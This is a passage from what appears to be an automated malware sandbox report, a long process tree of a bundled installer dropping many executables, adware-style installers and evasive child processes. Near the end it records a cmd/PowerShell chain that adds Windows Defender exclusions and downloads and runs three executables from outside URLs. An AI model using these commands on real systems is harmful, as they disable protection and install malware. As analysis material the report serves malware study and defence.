                                                                                                  "C:\Users\Admin\Documents\azqYMVlDgqKO5WHlsTZe8jCm.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4436
                                                                                                • C:\Users\Admin\Documents\xpbpGyeVjKWUzRiGTKUpjrlq.exe
                                                                                                  "C:\Users\Admin\Documents\xpbpGyeVjKWUzRiGTKUpjrlq.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4604
                                                                                                • C:\Users\Admin\Documents\1MozOgFBuVytq00lkg1cbk3L.exe
                                                                                                  "C:\Users\Admin\Documents\1MozOgFBuVytq00lkg1cbk3L.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:204
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-4ULP2.tmp\1MozOgFBuVytq00lkg1cbk3L.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-4ULP2.tmp\1MozOgFBuVytq00lkg1cbk3L.tmp" /SL5="$1024C,138429,56832,C:\Users\Admin\Documents\1MozOgFBuVytq00lkg1cbk3L.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:2132
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-4HCA0.tmp\Setup.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-4HCA0.tmp\Setup.exe" /Verysilent
                                                                                                      4⤵
                                                                                                        PID:4904
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4252
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 760
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:6100
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 784
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:5316
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 808
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:5936
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 824
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:1708
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1060
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:4908
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1088
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:3272
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1036
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:5256
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1128
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:5284
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1248
                                                                                                            6⤵
                                                                                                            • Program crash
                                                                                                            PID:6080
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4724
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MGPVE.tmp\Inlog.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MGPVE.tmp\Inlog.tmp" /SL5="$3024A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                            6⤵
                                                                                                              PID:4680
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Enumerates connected drives
                                                                                                            • Modifies system certificate store
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:4956
                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:736
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4924
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-E5R71.tmp\VPN.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-E5R71.tmp\VPN.tmp" /SL5="$102D2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:1620
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-KQUIB.tmp\Setup.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-KQUIB.tmp\Setup.exe" /silent /subid=720
                                                                                                                7⤵
                                                                                                                  PID:6796
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-TUDLH.tmp\Setup.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-TUDLH.tmp\Setup.tmp" /SL5="$20478,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-KQUIB.tmp\Setup.exe" /silent /subid=720
                                                                                                                    8⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Modifies system certificate store
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:6188
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                      9⤵
                                                                                                                        PID:7396
                                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                          tapinstall.exe remove tap0901
                                                                                                                          10⤵
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          PID:4408
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                        9⤵
                                                                                                                          PID:6764
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            10⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Enumerates connected drives
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            PID:6620
                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                                                                            10⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            PID:6588
                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:8292
                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:8440
                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:2192
                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3476
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-PF122.tmp\WEATHER Manager.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-PF122.tmp\WEATHER Manager.tmp" /SL5="$102DC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                    6⤵
                                                                                                                      PID:4432
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-IBIPO.tmp\Setup.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-IBIPO.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                        7⤵
                                                                                                                          PID:6620
                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-IBIPO.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-IBIPO.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                            8⤵
                                                                                                                              PID:6140
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:3168
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-B1RN1.tmp\MediaBurner2.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-B1RN1.tmp\MediaBurner2.tmp" /SL5="$202FE,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:4684
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-9I1G7.tmp\3377047_logo_media.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-9I1G7.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                            7⤵
                                                                                                                            • Drops file in Drivers directory
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            PID:5336
                                                                                                                            • C:\Program Files\MSBuild\VDSAXCEICN\ultramediaburner.exe
                                                                                                                              "C:\Program Files\MSBuild\VDSAXCEICN\ultramediaburner.exe" /VERYSILENT
                                                                                                                              8⤵
                                                                                                                                PID:5888
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-VI76U.tmp\ultramediaburner.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-VI76U.tmp\ultramediaburner.tmp" /SL5="$10516,281924,62464,C:\Program Files\MSBuild\VDSAXCEICN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                  9⤵
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:6044
                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                    10⤵
                                                                                                                                      PID:5796
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\af-8c631-a23-dc2a1-c8cdbaeb71b42\Rupozhusuha.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\af-8c631-a23-dc2a1-c8cdbaeb71b42\Rupozhusuha.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  PID:1328
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                    dw20.exe -x -s 2720
                                                                                                                                    9⤵
                                                                                                                                      PID:8924
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ea-ec72c-ce5-3bfa8-fe4736085e550\Lipihicuxu.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ea-ec72c-ce5-3bfa8-fe4736085e550\Lipihicuxu.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:7284
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hurvqpnc.mpl\GcleanerEU.exe /eufive & exit
                                                                                                                                        9⤵
                                                                                                                                          PID:6272
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\hurvqpnc.mpl\GcleanerEU.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\hurvqpnc.mpl\GcleanerEU.exe /eufive
                                                                                                                                            10⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5776
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edsoytka.ymv\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                          9⤵
                                                                                                                                            PID:6852
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\edsoytka.ymv\installer.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\edsoytka.ymv\installer.exe /qn CAMPAIGN="654"
                                                                                                                                              10⤵
                                                                                                                                                PID:7408
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snvlqwfb.h2u\ufgaa.exe & exit
                                                                                                                                              9⤵
                                                                                                                                                PID:6248
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sfgblxhk.yjn\anyname.exe & exit
                                                                                                                                                9⤵
                                                                                                                                                  PID:3700
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    10⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4432
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sfgblxhk.yjn\anyname.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\sfgblxhk.yjn\anyname.exe
                                                                                                                                                    10⤵
                                                                                                                                                      PID:3332
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sfgblxhk.yjn\anyname.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sfgblxhk.yjn\anyname.exe" -q
                                                                                                                                                        11⤵
                                                                                                                                                          PID:8016
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0uq5eva.ozi\gcleaner.exe /mixfive & exit
                                                                                                                                                      9⤵
                                                                                                                                                        PID:6660
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          10⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4472
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a0uq5eva.ozi\gcleaner.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\a0uq5eva.ozi\gcleaner.exe /mixfive
                                                                                                                                                          10⤵
                                                                                                                                                            PID:3748
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfdh3fj5.3pu\autosubplayer.exe /S & exit
                                                                                                                                                          9⤵
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:7608
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4372
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5776
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4548
                                                                                                                                                      • C:\Users\Admin\Documents\9NJ2c2dn9S9g_so0fWJKIhWB.exe
                                                                                                                                                        "C:\Users\Admin\Documents\9NJ2c2dn9S9g_so0fWJKIhWB.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:1408
                                                                                                                                                        • C:\Users\Admin\Documents\9NJ2c2dn9S9g_so0fWJKIhWB.exe
                                                                                                                                                          "C:\Users\Admin\Documents\9NJ2c2dn9S9g_so0fWJKIhWB.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:8276
                                                                                                                                                        • C:\Users\Admin\Documents\SuT4R8osm7g4ReEGyeYNxpQE.exe
                                                                                                                                                          "C:\Users\Admin\Documents\SuT4R8osm7g4ReEGyeYNxpQE.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          PID:1360
                                                                                                                                                        • C:\Users\Admin\Documents\t1Fo10eM3dZK0FDDP3bCDdZx.exe
                                                                                                                                                          "C:\Users\Admin\Documents\t1Fo10eM3dZK0FDDP3bCDdZx.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4356
                                                                                                                                                        • C:\Users\Admin\Documents\iDENxSNXn_elanqVzB8Nlv4L.exe
                                                                                                                                                          "C:\Users\Admin\Documents\iDENxSNXn_elanqVzB8Nlv4L.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2224
                                                                                                                                                        • C:\Users\Admin\Documents\6uUr0JbsIua9o03ByCQYA7L9.exe
                                                                                                                                                          "C:\Users\Admin\Documents\6uUr0JbsIua9o03ByCQYA7L9.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:392
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-3N52T.tmp\6uUr0JbsIua9o03ByCQYA7L9.tmp
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-3N52T.tmp\6uUr0JbsIua9o03ByCQYA7L9.tmp" /SL5="$203CA,138429,56832,C:\Users\Admin\Documents\6uUr0JbsIua9o03ByCQYA7L9.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:748
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-9U2KV.tmp\Setup.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-9U2KV.tmp\Setup.exe" /Verysilent
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5144
                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  PID:7872
                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:6872
                                                                                                                                                            • C:\Users\Admin\Documents\OWGv09AiHgfkRqJsE00pYxbc.exe
                                                                                                                                                              "C:\Users\Admin\Documents\OWGv09AiHgfkRqJsE00pYxbc.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              PID:5892
                                                                                                                                                            • C:\Users\Admin\Documents\hOSjnkns5eXWMx0ylnwSlKSn.exe
                                                                                                                                                              "C:\Users\Admin\Documents\hOSjnkns5eXWMx0ylnwSlKSn.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:5904
                                                                                                                                                              • C:\Users\Admin\Documents\hOSjnkns5eXWMx0ylnwSlKSn.exe
                                                                                                                                                                C:\Users\Admin\Documents\hOSjnkns5eXWMx0ylnwSlKSn.exe
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:6664
                                                                                                                                                              • C:\Users\Admin\Documents\oyAj95ghI_U0V9Rgb0RAb47l.exe
                                                                                                                                                                "C:\Users\Admin\Documents\oyAj95ghI_U0V9Rgb0RAb47l.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:4268
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5331462.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5331462.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:7576
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\4879704.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\4879704.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:7656
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4294799.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4294799.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                        PID:7620
                                                                                                                                                                    • C:\Users\Admin\Documents\VRMpkIXyoS9F0u6k__OGFyiw.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\VRMpkIXyoS9F0u6k__OGFyiw.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:3260
                                                                                                                                                                      • C:\Users\Admin\Documents\xDLh9rzzzM8bm1aSrcvEgiAy.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\xDLh9rzzzM8bm1aSrcvEgiAy.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:1100
                                                                                                                                                                        • C:\Users\Admin\Documents\xDLh9rzzzM8bm1aSrcvEgiAy.exe
                                                                                                                                                                          C:\Users\Admin\Documents\xDLh9rzzzM8bm1aSrcvEgiAy.exe
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:6740
                                                                                                                                                                        • C:\Users\Admin\Documents\G1PAPGMDhZZTvqv7C4Des4RV.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\G1PAPGMDhZZTvqv7C4Des4RV.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5188
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:6088
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:6460
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:5232
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:7384
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:8068
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:964
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:3700
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:2128
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:964
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
